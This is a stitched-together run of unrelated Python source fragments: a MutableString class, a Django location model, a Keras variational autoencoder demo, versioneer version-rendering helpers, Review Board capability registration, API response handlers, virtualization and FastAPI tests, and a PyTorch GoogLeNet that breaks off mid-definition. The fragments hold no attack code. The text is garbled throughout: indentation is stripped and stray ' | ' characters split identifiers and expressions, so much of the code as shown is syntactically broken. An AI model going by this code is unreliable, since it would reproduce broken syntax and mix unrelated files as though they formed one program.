def rindex(self, sub, start=0, end=sys.maxint):
return self.data.rindex(sub, start, end)
def rjust(self, width): return self.__class__(self.data.rjust(width))
def rstrip(self): return self.__class__(self.data.rstrip())
def split(self, sep=None, maxsplit=-1):
return self.data.split(sep, maxsplit)
def splitlines(self, keepends=0): return self.data.splitlines(keepends)
def startswith(self, prefix, start=0, end=sys.maxint):
        return self.data.startswith(prefix, start, end)
def strip(self): return self.__class__(self.data.strip())
def swapcase(self): return self.__class__(self.data.swapcase())
def title(self): return self.__class__(self.data.title())
def translate(self, *args):
return self.__class__(self.data.translate(*args))
def upper(self): return self.__class__(self.data.upper())
class MutableString(UserString):
"""mutable string objects
Python strings are i | mmutable objects. This has the advantage, that
strings may be used as dictionary keys. If this property isn't needed
and you insist on changing string values in place instead, you may cheat
and use MutableString.
But the purpose of this class is an educational one: to prevent
people from inventing their own mutable string class derived
from UserString and than forget thereby to remove (override) the
__hash__ method inherited from ^UserString. This would lead to
errors that would be very hard to track down.
A faster and better solution is to rewrite your program using lists."""
def __init__(self, string=""):
self.data = string
def __hash__(self):
raise TypeError, "unhashable type (it is mutable)"
def __setitem__(self, index, sub):
if index < 0 or index >= len(self.data): raise IndexError
self.data = self.data[:index] + sub + self.data[index+1:]
def __delitem__(self, index):
if index < 0 or index >= len(self.data): raise IndexError
self.data = self.data[:index] + self.data[index+1:]
def __setslice__(self, start, end, sub):
start = max(start, 0); end = max(end, 0)
if isinstance(sub, UserString):
self.data = self.data[:start]+sub.data+self.data[end:]
elif isinstance(sub, StringType) or isinstance(sub, UnicodeType):
self.data = self.data[:start]+sub+self.data[end:]
else:
self.data = self.data[:start]+str(sub)+self.data[end:]
def __delslice__(self, start, end):
start = max(start, 0); end = max(end, 0)
self.data = self.data[:start] + self.data[end:]
def immutable(self):
return UserString(self.data)
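# Quick illustration of the trade-off described in the docstring above
# (example values invented):
#   s = MutableString("spam")
#   s[0] = "S"          # in-place edit: s is now "Spam"
#   hash(s)             # raises TypeError: unhashable type (it is mutable)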
if __name__ == "__main__":
# execute the regression test to stdout, if called as a script:
import os
called_in_dir, called_as = os.path.split(sys.argv[0])
called_in_dir = os.path.abspath(called_in_dir)
called_as, py = os.path.splitext(called_as)
sys.path.append(os.path.join(called_in_dir, 'test'))
if '-q' in sys.argv:
import test_support
test_support.verbose = 0
__import__('test_' + called_as.lower())
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.db import models
class Location(models.Model):
    address = models.CharField(max_length=255, blank=True)  # max_length is required by CharField; 255 is an assumed value
latitude = models.DecimalField(max_digits=10, decimal_places=6)
longitude = models.DecimalField(max_digits=10, decimal_places=6)
    created = models.DateTimeField(auto_now_add=True, editable=False)
    updated = models.DateTimeField(auto_now=True, editable=False)
owner = models.ForeignKey(User)
def get_absolute_url(self) | :
return reverse('location-detail', args=[str(self.id)])
    def __str__(self):
        return '{id: %d, latitude: %s, longitude: %s}' % (
            self.id,
            self.latitude,
            self.longitude
        )
class Meta:
app_label = 'locations'
get_latest_by = 'updated'
ordering = ['updated']
verbose_name = 'location'
verbose_name_plural = 'Locations'
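# Hypothetical usage relying only on what the model declares above:
#   Location.objects.latest()   # uses Meta.get_latest_by = 'updated'
#   loc.get_absolute_url()      # reverses the 'location-detail' URL pattern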
'''This script demonstrates how to build a variational autoencoder
with Keras and deconvolution layers.
Reference: "Auto-Encoding Variational Bayes" https://arxiv.org/abs/1312.6114
'''
import numpy as np
import matplotlib.pyplot as plt
from scipy.stats import norm
from keras.layers import Input, Dense, Lambda, Flatten, Reshape, Layer
from keras.layers import Conv2D, Conv2DTranspose
from keras.models import Model
from keras import backend as K
from keras import metrics
from keras.datasets import mnist
# input image dimensions
img_rows, img_cols, img_chns = 28, 28, 1
# number of convolutional filters to use
filters = 64
# convolution kernel size
num_conv = 3
batch_size = 100
if K.image_data_format() == 'channels_first':
original_img_size = (img_chns, img_rows, img_cols)
else:
original_img_size = (img_rows, img_cols, img_chns)
latent_dim = 2
intermediate_dim = 128
epsilon_std = 1.0
epochs = 5
x = Input(batch_shape=(batch_size,) + original_img_size)
conv_1 = Conv2D(img_chns,
kernel_size=(2, 2),
padding='same', activation='relu')(x)
conv_2 = Conv2D(filters,
kernel_size=(2, 2),
padding='same', activation='relu',
strides=(2, 2))(conv_1)
conv_3 = Conv2D(filters,
kernel_size=num_conv,
padding='same', activation='relu',
strides=1)(conv_2)
conv_4 = Conv2D(filters,
kernel_size=num_conv,
padding='same', activation='relu',
strides=1)(conv_3)
flat = Flatten()(conv_4)
hidden = Dense(intermediate_dim, activation='relu')(flat)
z_mean = Dense(latent_dim)(hidden)
z_log_var = Dense(latent_dim)(hidden)
def sampling(args):
z_mean, z_log_var = args
epsilon = K.random_normal(shape=(batch_size, latent_dim),
mean=0., stddev=epsilon_std)
return z_mean + K.exp(z_log_var) * epsilon
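# (Reparameterization trick: writing z = mu + sigma * eps keeps the sampling
# step differentiable w.r.t. z_mean and z_log_var. Note this script scales by
# exp(z_log_var); many formulations use exp(z_log_var / 2) so that z_log_var
# is the log *variance* rather than the log standard deviation.)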
# note that "output_shape" isn't necessary with the TensorFlow backend
# so you could write `Lambda(sampling)([z_mean, z_log_var])`
z = Lambda(sampling, output_shape=(latent_dim,))([z_mean, z_log_var])
# we instantiate these layers separately so as to reuse them later
decoder_hid = Dense(intermediate_dim, activation='relu')
decoder_upsample = Dense(filters * 14 * 14, activation='relu')
if K.image_data_format() == 'channels_first':
output_shape = (batch_size, filters, 14, 14)
else:
output_shape = (batch_size, 14, 14, filters)
decoder_reshape = Reshape(output_shape[1:])
decoder_deconv_1 = Conv2DTranspose(filters,
kernel_size=num_conv,
padding='same',
strides=1,
activation='relu')
decoder_deconv_2 = Conv2DTranspose(filters, num_conv,
padding='same',
strides=1,
activation='relu')
if K.image_data_format() == 'channels_first':
output_shape = (batch_size, filters, 29, 29)
else:
output_shape = (batch_size, 29, 29, filters)
decoder_deconv_3_upsamp = Conv2DTranspose(filters,
kernel_size=(3, 3),
strides=(2, 2),
padding='valid',
activation='relu')
decoder_mean_squash = Conv2D(img_chns,
kernel_size=2,
padding='valid',
activation='sigmoid')
hid_decoded = decoder_hid(z)
up_decoded = decoder_upsample(hid_decoded)
reshape_decoded = decoder_reshape(up_decoded)
deconv_1_decoded = decoder_deconv_1(reshape_decoded)
deconv_2_decoded = decoder_deconv_2(deconv_1_decoded)
x_decoded_relu = decoder_deconv_3_upsamp(deconv_2_decoded)
x_decoded_mean_squash = decoder_mean_squash(x_decoded_relu)
# Custom loss layer
class CustomVariationalLayer(Layer):
def __init__(self, **kwargs):
self.is_placeholder = True
super(CustomVariationalLayer, self).__init__(**kwargs)
def vae_loss(self, x, x_decoded_mean_squash):
x = K.flatten(x)
x_decoded_mean_squash = K.flatten(x_decoded_mean_squash)
        xent_loss = img_rows * img_cols * metrics.binary_crossentropy(x, x_decoded_mean_squash)
        kl_loss = - 0.5 * K.mean(1 + z_log_var - K.square(z_mean) - K.exp(z_log_var), axis=-1)
return K.mean(xent_loss + kl_loss)
def call(self, inputs):
x = inputs[0]
x_decoded_mean_squash = inputs[1]
loss = self.vae_loss(x, x_decoded_mean_squash)
self.add_loss(loss, inputs=inputs)
# We don't use this output.
return x
y = CustomVariationalLayer()([x, x_decoded_mean_squash])
vae = Model(x, y)
vae.compile(optimizer='rmsprop', loss=None)
vae.summary()
# train the VAE on MNIST digits
(x_train, _), (x_test, y_test) = mnist.load_data()
x_train = x_train.astype('float32') / 255.
x_train = x_train.reshape((x_train.shape[0],) + original_img_size)
x_test = x_test.astype('float32') / 255.
x_test = x_test.reshape((x_test.shape[0],) + original_img_size)
print('x_train.shape:', x_train.shape)
vae.fit(x_train,
shuffle=True,
epochs=epochs,
batch_size=batch_size,
validation_data=(x_test, x_test))
# build a model to project inputs on the latent space
encoder = Model(x, z_mean)
# display a 2D plot of the digit classes in the latent space
x_test_encoded = encoder.predict(x_test, batch_size=batch_size)
plt.figure(figsize=(6, 6))
plt.scatter(x_test_encoded[:, 0], x_test_encoded[:, 1], c=y_test)
plt.colorbar()
plt.show()
# build a digit generator that can sample from the learned distribution
decoder_input = Input(shape=(latent_dim,))
_hid_decoded = decoder_hid(decoder_input)
_up_decoded = decoder_upsample(_hid_decoded)
_reshape_decoded = decoder_reshape(_up_decoded)
_deconv_1_decoded = decoder_deconv_1(_reshape_decoded)
_deconv_2_decoded = decoder_deconv_2(_deconv_1_decoded)
_x_decoded_relu = decoder_deconv_3_upsamp(_deconv_2_decoded)
_x_decoded_mean_squash = decoder_mean_squash(_x_decoded_relu)
generator = Model(decoder_input, _x_decoded_mean_squash)
# display a 2D manifold of the digits
n = 15 # figure with 15x15 digits
digit_size = 28
figure = np.zeros((digit_size * n, digit_size * n))
# linearly spaced coordinates on the unit square were transformed through the inverse CDF (ppf) of the Gaussian
# to produce values of the latent variables z, since the prior of the latent space is Gaussian
grid_x = norm.ppf(np.linspace(0.05, 0.95, n))
grid_y = norm.ppf(np.linspace(0.05, 0.95, n))
for i, yi in enumerate(grid_x):
for j, xi in enumerate(grid_y):
z_sample = np.array([[xi, yi]])
z_sample = np.tile(z_sample, batch_size).reshape(batch_size, 2)
x_decoded = generator.predict(z_sample, batch_size=batch_size)
digit = x_decoded[0].reshape(digit_size, digit_size)
figure[i * digit_size: (i + 1) * digit_size,
j * digit_size: (j + 1) * digit_size] = digit
plt.figure(figsize=(10, 10))
plt.imshow(figure, cmap='Greys_r')
plt.show()
    if verbose:
print("discarding '%s', no digits" % ",".join(refs - tags))
if verbose:
print("likely tags: %s" % ",".join(sorted(tags)))
for ref in sorted(tags):
# sorting will prefer e.g. "2.0" over "2.0rc1"
if ref.startswith(tag_prefix):
r = ref[len(tag_prefix):]
if verbose:
print("picking %s" % r)
return {"version": r,
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": None,
"date": date}
# no suitable tags, so version is "0+unknown", but full hex is still there
if verbose:
print("no suitable tags, using unknown + full revision id")
return {"version": "0+unknown",
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": "no suitable tags", "date": None}
@register_vcs_handler("git", "pieces_from_vcs")
def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command):
"""Get version from 'git describe' in the root of the source tree.
This only gets called if the git-archive 'subst' keywords were *not*
expanded, and _version.py hasn't already been rewritten with a short
version string, meaning we're inside a checked out source tree.
"""
GITS = ["git"]
if sys.platform == "win32":
GITS = ["git.cmd", "git.exe"]
out, rc = run_command(GITS, ["rev-parse", "--git-dir"], cwd=root,
hide_stderr=True)
if rc != 0:
if verbose:
print("Directory %s not under git control" % root)
raise NotThisMethod("'git rev-parse --git-dir' returned error")
# if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty]
# if there isn't one, this yields HEX[-dirty] (no NUM)
describe_out, rc = run_command(GITS, ["describe", "--tags", "--dirty",
"--always", "--long",
"--match", "%s*" % tag_prefix],
cwd=root)
# --long was added in git-1.5.5
if describe_out is None:
raise NotThisMethod("'git describe' failed")
describe_out = describe_out.strip()
full_out, rc = run_command(GITS, ["rev-parse", "HEAD"], cwd=root)
if full_out is None:
raise NotThisMethod("'git rev-parse' failed")
full_out = full_out.strip()
pieces = {}
pieces["long"] = full_out
pieces["short"] = full_out[:7] # maybe improved later
pieces["error"] = None
# parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty]
# TAG might have hyphens.
git_describe = describe_out
# look for -dirty suffix
dirty = git_describe.endswith("-dirty")
pieces["dirty"] = dirty
if dirty:
git_describe = git_describe[:git_describe.rindex("-dirty")]
# now we have TAG-NUM-gHEX or HEX
if "-" in git_describe:
# TAG-NUM-gHEX
mo = re.search(r'^(.+)-(\d+)-g([0-9a-f]+)$', git_describe)
if not mo:
# unparseable. Maybe git-describe is misbehaving?
pieces["error"] = ("unable to parse git-describe output: '%s'"
% describe_out)
return pieces
# tag
full_tag = mo.group(1)
if not full_tag.startswith(tag_prefix):
if verbose:
fmt = "tag '%s' doesn't start with prefix '%s'"
print(fmt % (full_tag, tag_prefix))
pieces["error"] = ("tag '%s' doesn't start with prefix '%s'"
% (full_tag, tag_prefix))
return pieces
pieces["closest-tag"] = full_tag[len(tag_prefix):]
# distance: number of commits since tag
pieces["distance"] = int(mo.group(2))
# commit: short hex revision ID
pieces["short"] = mo.group(3)
else:
# HEX: no tags
pieces["closest-tag"] = None
count_out, rc = run_command(GITS, ["rev-list", "HEAD", "--count"],
cwd=root)
pieces["distance"] = int(count_out) # total number of commits
# commit date: see ISO-8601 comment in git_versions_from_keywords()
date = run_command(GITS, ["show", "-s", "--format=%ci", "HEAD"],
cwd=root)[0].strip()
pieces["date"] = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
return pieces
def plus_or_dot(pieces):
"""Return a + if we don't already have one, else return a ."""
if "+" in pieces.get("closest-tag", ""):
return "."
return "+"
def render_pep440(pieces):
"""Build up version string, with post-release "local version identifier".
Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you
    get a tagged build and then dirty it, you'll get TAG+0.gHEX.dirty
Exceptions:
1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += plus_or_dot(pieces)
rendered += "%d.g%s" % (pieces["distance | "], pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
else:
# exception #1
rendered = "0+untagged.%d.g%s" % (pieces["distance"],
pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
return rendered
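# Illustrative renderings (values invented): closest-tag "1.2", distance 3,
# short hash "abcdef1" gives "1.2+3.gabcdef1" (plus ".dirty" when dirty);
# with no tags at all it gives "0+untagged.3.gabcdef1".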
def render_pep440_pre(pieces):
"""TAG[.post.devDISTANCE] -- No -dirty.
Exceptions:
1: no tags. 0.post.devDISTANCE
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += ".post.dev%d" % pieces["distance"]
else:
# exception #1
rendered = "0.post.dev%d" % pieces["distance"]
return rendered
def render_pep440_post(pieces):
"""TAG[.postDISTANCE[.dev0]+gHEX] .
The ".dev0" means dirty. Note that .dev0 sorts backwards
(a dirty tree will appear "older" than the corresponding clean one),
but you shouldn't be releasing software with -dirty anyways.
Exceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += plus_or_dot(pieces)
rendered += "g%s" % pieces["short"]
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += "+g%s" % pieces["short"]
return rendered
def render_pep440_old(pieces):
"""TAG[.postDISTANCE[.dev0]] .
The ".dev0" means dirty.
    Exceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
return rendered
def render_git_describe(pieces):
"""TAG[-DISTANCE-gHEX][-dirty].
Like 'git describe --tags --dirty --always'.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render_git_describe_long(pieces):
"""TAG-DISTANCE-gHEX[-dirty].
    Like 'git describe --tags --dirty --always --long'.
The distance/hash is unconditional.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
from __future__ import unicode_literals
import logging
from django.conf import settings
from reviewboard import get_version_string, get_package_version, is_release
from reviewboard.admin.server import get_server_url
_registered_capabilities = {}
_capabilities_defaults = {
'diffs': {
'base_commit_ids': True,
'moved_files': True,
'validation': {
'base_commit_ids': True,
}
},
'review_requests': {
'commit_ids': True,
},
'scmtools': {
'git': {
'empty_files': True,
},
'mercurial': {
'empty_files': True,
},
'perforce': {
'moved_files': True,
'empty_files': True,
},
'svn': {
'empty_files': True,
},
},
'text': {
'markdown': True,
'per_field_text_types': True,
'can_include_raw_values': True,
},
}
def get_server_info(request=None):
"""Returns server information for use in the API.
This is used for the root resource and for the deprecated server
info resource.
"""
capabilities = _capabilities_defaults.copy()
capabilities.update(_registered_capabilities)
return {
'product': {
'name': 'Review Board',
'version': get_version_string(),
'package_version': get_package_version(),
'is_release': is_release(),
},
'site': {
'url': get_server_url(request=request),
'administrators': [
{
'name': name,
'email': email,
}
for name, email in settings.ADMINS
],
'time_zone': settings.TIME_ZONE,
},
'capabilities': capabilities
}
def register_webapi_capabilities(capabilities_id, caps):
"""Registers a set of web API capabilities.
These capabilities will appear in the dictionary of available
capabilities with the ID as their key.
    The capabilities_id is passed in and can only be registered once.
    A KeyError will be thrown if attempting to register it a second time.
"""
if not capabilities_id:
raise ValueError('The capabilities_id attribute must not be None')
    if capabilities_id in _registered_capabilities:
raise KeyError('"%s" is already a registered set of capabilities'
                       % capabilities_id)
if capabilities_id in _capabilities_defaults:
raise KeyError('"%s" is reserved for the default set of capabilities'
% capabilities_id)
_registered_capabilities[capabilities_id] = caps
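# Hedged usage sketch using only the functions above (the capabilities id and
# flags are invented):
#   register_webapi_capabilities('myvendor', {'fancy_diffs': True})
#   get_server_info()['capabilities']['myvendor']  # -> {'fancy_diffs': True}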
def unregister_webapi_capabilities(capabilities_id):
"""Unregisters a previously registered set of web API capabilities."""
try:
del _registered_capabilities[capabilities_id]
except KeyError:
logging.error('Failed to unregister unknown web API capabilities '
'"%s".',
capabilities_id)
raise KeyError('"%s" is not a registered web API capabilities set'
% capabilities_id)
import _plotly_utils.basevalidators
class ValueminusValidator(_plotly_utils.basevalidators.NumberValidator):
def __init__(
        self, plotly_name="valueminus", parent_name="scatter3d.error_z", **kwargs
):
super(ValueminusValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "calc"),
min=kwargs.pop("min", 0),
role=kwargs.pop("role", | "info"),
**kwargs
)
from httpx import AsyncClient
# Runtime import to avoid syntax errors in samples on Python < 3.5 and reach top-dir
import os
_TOP_DIR = os.path.abspath(
    os.path.sep.join((
os.path.dirname(__file__),
'../',
)),
)
_SAMPLES_DIR = os.path.abspath(
os.path.sep.join((
os.path.dirname(__file__),
'../samples/',
)),
)
import sys
sys.path.append(_TOP_DIR)
sys.path.append(_SAMPLES_DIR)
from asyncutils import AsyncTestCase
from wiringfastapi import web
class WiringFastAPITest(AsyncTestCase):
client: AsyncClient
def setUp(self) -> None:
super().setUp()
self.client = AsyncClient(app=web.app, base_url='http://test')
def tearDown(self) -> None:
self._run(self.client.aclose())
super().tearDown()
def test_depends_marker_injection(self):
class ServiceMock:
async def process(self):
return 'Foo'
with web.container.service.override(ServiceMock()):
response = self._run(self.client.get('/'))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json(), {'result': 'Foo'})
def test_depends_injection(self):
response = self._run(self.client.get('/auth', auth=('john_smith', 'secret')))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json(), {'username': 'john_smith', 'password': 'secret'})
'''
:codeauthor: {{full_name}} <{{email}}>
'''
from tests.support.mixins import LoaderModuleMockMixin
from tests.support.unit import TestCase
from tests.support.mock import patch
import salt.states.{{module_name}} as {{module_name}}
class {{module_name|capitalize}}TestCase(TestCase, LoaderModuleMockMixin):
    def setup_loader_modules(self):
return {% raw -%} {
{% endraw -%} {{module_name}} {%- raw -%}: {
'__env__': 'base'
}
} {%- endraw %}
def test_behaviour(self):
# Test inherent behaviours
pass
import logging
from autotest.client import utils
from autotest.client.shared import error
from virttest import env_process, utils_test
@error.context_aware
def run(test, params, env):
"""
    Vhost zero copy test
    1) Enable/disable vhost_net zero copy in the host.
    2) Boot the main VM.
    3) Run the ping test and check the guest NIC works.
    4) Check the VM is alive and has no crash.
:param test: QEMU test object.
:param params: Dictionary with the test parameters.
:param env: Dictionary with test environment.
"""
    def zerocp_enable_status():
"""
Check whether host have enabled zero copy, if enabled return True,
else return False.
"""
def_para_path = "/sys/module/vhost_net/parameters/experimental_zcopytx"
para_path = params.get("zcp_set_path", def_para_path)
cmd_status = utils.system("grep 1 %s" % para_path, ignore_status=True)
if cmd_status:
return False
else:
            return True
def enable_zerocopytx_in_host(enable=True):
"""
Enable or disable vhost_net zero copy in host
"""
cmd = "modprobe -rf vhost_net; "
if enable:
cmd += "modprobe vhost-net experimental_zcopytx=1"
else:
cmd += "modprobe vhost-net experimental_zcopytx=0"
if utils.system(cmd) or enable != zerocp_enable_status():
raise error.TestNAError("Set vhost_net zcopytx failed")
error.context("Set host vhost_net experimental_zcopytx", logging.info)
if params.get("enable_zerocp", 'yes') == 'yes':
enable_zerocopytx_in_host()
else:
enable_zerocopytx_in_host(False)
error.context("Boot vm with 'vhost=on'", logging.info)
params["vhost"] = "vhost=on"
params["start_vm"] = 'yes'
login_timeout = int(params.get("login_timeout", 360))
env_process.preprocess_vm(test, params, env, params.get("main_vm"))
vm = env.get_vm(params["main_vm"])
vm.verify_alive()
vm.wait_for_login(timeout=login_timeout)
guest_ip = vm.get_address()
error.context("Check guest nic is works by ping", logging.info)
status, output = utils_test.ping(guest_ip, count=10, timeout=20)
if status:
err_msg = "Run ping %s failed, after set zero copy" % guest_ip
raise error.TestError(err_msg)
elif utils_test.get_loss_ratio(output) == 100:
err_msg = "All packets lost during ping guest %s." % guest_ip
raise error.TestFail(err_msg)
# in vm.verify_alive will check whether have userspace or kernel crash
error.context("Check guest is alive and have no crash", logging.info)
vm.verify_alive()
from __future__ import absolute_import
from collections import namedtuple
from django.conf import settings
from sentry.utils.dates import to_datetime
from sentry.utils.services import LazyServiceWrapper
from .backends.base import Backend # NOQA
from .backends.dummy import DummyBackend # NOQA
backend = LazyServiceWrapper(Backend, settings.SENTRY_DIGESTS,
settings.SENTRY_DIGESTS_OPTIONS,
(DummyBackend,))
backend.expose(locals())
class Record(namedtuple('Record', 'key value timestamp')):
@property
def datetime(self):
return to_datetime(self.timestamp)
ScheduleEntry = namedtuple('ScheduleEntry', 'key timestamp')
OPTIONS = frozenset((
'increment_delay',
'maximum_delay',
'minimum_delay',
))
def get_option_key(plugin, option):
assert option in OPTIONS
return 'digests:{}:{}'.format(plugin, option)
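# Illustration (plugin name invented):
#   get_option_key('mail', 'maximum_delay')  # -> 'digests:mail:maximum_delay'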
"""
Handlers to process the responses from the Humble Bundle API
"""
__author__ = "Joel Pedraza"
__copyright__ = "Copyright 2014, Joel Pedraza"
__license__ = "MIT"
from humblebundle import exceptions
from humblebundle import models
import itertools
import requests
# Helper methods
def parse_data(response):
try:
return response.json()
except ValueError as e:
raise exceptions.HumbleParseException("Invalid JSON: %s", str(e),
request=response.request,
response=response)
def get_errors(data):
errors = data.get('errors', None)
error_msg = ", ".join(itertools.chain.from_iterable(v for k, v in errors.items())) \
if errors else "Unspecified error"
return errors, error_msg
def authenticated_response_helper(response, data):
# Successful API calls might not have a success property.
# It's not enough to check if it's falsy, as None is acceptable
success = data.get('success', None)
if success is True:
return True
error_id = data.get('error_id', None)
errors, error_msg = get_errors(data)
# API calls that require login and have a missing or invalid token
if error_id == 'login_required':
raise exceptions.HumbleAuthenticationException(
error_msg, request=response.request, response=response
)
# Something happened, we're not sure what but we hope the error_msg is
# useful
if success is False or errors is not None or error_id is not None:
raise exceptions.HumbleResponseException(
error_msg, request=response.request, response=response
)
# Response had no success or errors fields, it's probably data
return True
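# Response shapes the helper above distinguishes (illustrative, not taken from
# the API documentation):
#   {"success": true}                         -> returns True
#   {"error_id": "login_required", ...}       -> HumbleAuthenticationException
#   {"errors": {"field": ["msg", ...]}}       -> HumbleResponseException
#   anything else without those fields        -> treated as data, returns True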
# Response handlers
def login_handler(client, response):
""" login response always returns JSON """
data = parse_data(response)
success = data.get('success', None)
if success is True:
return True
captcha_required = data.get('captcha_required')
authy_required = data.get('authy_required')
errors, error_msg = get_errors(data)
if errors:
captcha = errors.get('captcha')
if captcha:
raise exceptions.HumbleCaptchaException(
error_msg, request=response.request, response=response,
captcha_required=captcha_required, authy_required=authy_required
)
username = errors.get('username')
if username:
raise exceptions.HumbleCredentialException(
error_msg, request=response.request, response=response,
captcha_required=captcha_required, authy_required=authy_required
)
authy_token = errors.get("authy-token")
if authy_token:
raise exceptions.HumbleTwoFactorException(
error_msg, request=response.request, response=response,
captcha_required=captcha_required, authy_required=authy_required
            )
raise exceptions.HumbleAuthenticationException(
        error_msg, request=response.request, response=response,
captcha_required=captcha_required, authy_required=authy_required
)
def gamekeys_handler(client, response):
""" get_gamekeys response always returns JSON """
data = parse_data(response)
if isinstance(data, list):
return [v['gamekey'] for v in data]
# Let the helper function raise any common exceptions
authenticated_response_helper(response, data)
# We didn't get a list, or an error message
raise exceptions.HumbleResponseException(
"Unexpected response body", request=response.request, response=response
)
def order_list_handler(client, response):
""" order_list response always returns JSON """
data = parse_data(response)
if isinstance(data, list):
return [models.Order(client, order) for order in data]
# Let the helper function raise any common exceptions
authenticated_response_helper(response, data)
# We didn't get a list, or an error message
raise exceptions.HumbleResponseException(
"Unexpected response body", request=response.request, response=response
)
def order_handler(client, response):
""" order response might be 404 with no body if not found """
if response.status_code == requests.codes.not_found:
raise exceptions.HumbleResponseException(
"Order not found", request=response.request, response=response
)
data = parse_data(response)
# The helper function should be sufficient to catch any other errors
if authenticated_response_helper(response, data):
return models.Order(client, data)
def claimed_entities_handler(client, response):
"""
claimed_entities response always returns JSON
returns parsed json dict
"""
data = parse_data(response)
# The helper function should be sufficient to catch any errors
if authenticated_response_helper(response, data):
return data
def sign_download_url_handler(client, response):
""" sign_download_url response always returns JSON """
data = parse_data(response)
# If the request is unauthorized (this includes invalid machine names) this
    # response has its own error syntax
errors = data.get('_errors', None)
message = data.get('_message', None)
if errors:
error_msg = "%s: %s" % (errors, message)
raise exceptions.HumbleResponseException(
error_msg, request=response.request, response=response
)
# If the user isn't signed in we get a "typical" error response
if authenticated_response_helper(response, data):
return data['signed_url']
def store_products_handler(client, response):
""" Takes a results from the store as JSON and converts it to object """
data = parse_data(response)
return [models.StoreProduct(client, result) for result in data['results']]
__author__ = 'Varun Nayyar'
from Utils.MFCCArrayGen import emotions, speakers, getCorpus
from MCMC import MCMCRun
from emailAlerter import alertMe
def main2(numRuns = 100000, numMixtures = 8, speakerIndex = 6):
import time
for emotion in emotions:
        start = time.ctime()
Xpoints = getCorpus(emotion, speakers[speakerIndex])
message = MCMCRun(Xpoints, emotion+"-"+speakers[speakerIndex], numRuns, numMixtures)
message += "Start time: {}\nEnd Time: {}\n".format(start, time.ctime())
message += "\nNumRuns: {}, numMixtures:{}\n ".format(numRuns, numMixtures)
message += "\nEmotion: {}, speaker:{}\n".format(emotion, speakers[speakerIndex])
alertMe(message)
if __name__ == "__main__":
for i in xrange(len(speakers)):
        main2(numMixtures=8, speakerIndex=i)
default_app_config = 'user_deletion.apps.UserDeletionConfig'
'''GoogLeNet with PyTorch.'''
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
class Inception(nn.Module):
def __init__(self, in_planes, n1x1, n3x3red, n3x3, n5x5red, n5x5, pool_planes):
super(Inception, self).__init__()
# 1x1 conv branch
self.b1 = nn.Sequential(
nn.Conv2d(in_planes, n1x1, kernel_size=1),
nn.BatchNorm2d(n1x1),
nn.ReLU(True),
)
# 1x1 conv -> 3x3 conv branch
self.b2 = nn.Sequential(
nn.Conv2d(in_planes, n3x3red, kernel_size=1),
nn.BatchNorm2d(n3x3red),
nn.ReLU(True),
nn.Conv2d(n3x3red, n3x3, kernel_size=3, padding=1),
nn.BatchNorm2d(n3x3),
nn.ReLU(True),
)
# 1x1 conv -> 5x5 conv branch
self.b3 = nn.Sequential(
nn.Conv2d(in_planes, n5x5red, kernel_size=1),
nn.BatchNorm2d(n5x5red),
nn.ReLU(True),
nn.Conv2d(n5x5red, n5x5, kernel_size=3, padding=1),
nn.BatchNorm2d(n5x5),
nn.ReLU(True),
nn.Conv2d(n5x5, n5x5, kernel_size=3, padding=1),
nn.BatchNorm2d(n5x5),
nn.ReLU(True),
)
# 3x3 pool -> 1x1 conv branch
self.b4 = nn.Sequential(
nn.MaxPool2d(3, stride=1, padding=1),
nn.Conv2d(in_planes, pool_planes, kernel_size=1),
nn.BatchNorm2d(pool_planes),
nn.ReLU(True),
)
def forward(self, x):
y1 = self.b1(x)
y2 = self.b2(x)
y3 = self.b3(x)
y4 = self.b4(x)
return torch.cat([y1,y2,y3,y4], 1)
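# Channel bookkeeping implied by the four branches above: each Inception block
# outputs n1x1 + n3x3 + n5x5 + pool_planes channels. For example, a3 below
# yields 64 + 128 + 32 + 32 = 256, which matches b3's in_planes.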
class GoogLeNet(nn.Module):
def __init__(self):
super(GoogLeNet, self).__init__()
self.pre_layers = nn.Sequential(
nn.Conv2d(3, 192, kernel_size=3, padding=1),
nn.BatchNorm2d(192),
nn.ReLU(True),
)
self.a3 = Inception(192, 64, 96, 128, 16, 32, 32)
self.b3 = Inception(256, 128, 128, 192, 32, 96, 64)
self.maxpool = nn.MaxPool2d(3, stride=2, padding=1)
self.a4 = Inception(480, 192, 96, 208, 16, 48, 64)
self.b4 = Inception(512, 160, 112, 224, 24, 64, 64)
self.c4 = Inception(512, 128, 128, 256, 24, 64, 64)
self.d4 = Inception(512, 112, 144, 288, 32, 64, 64)
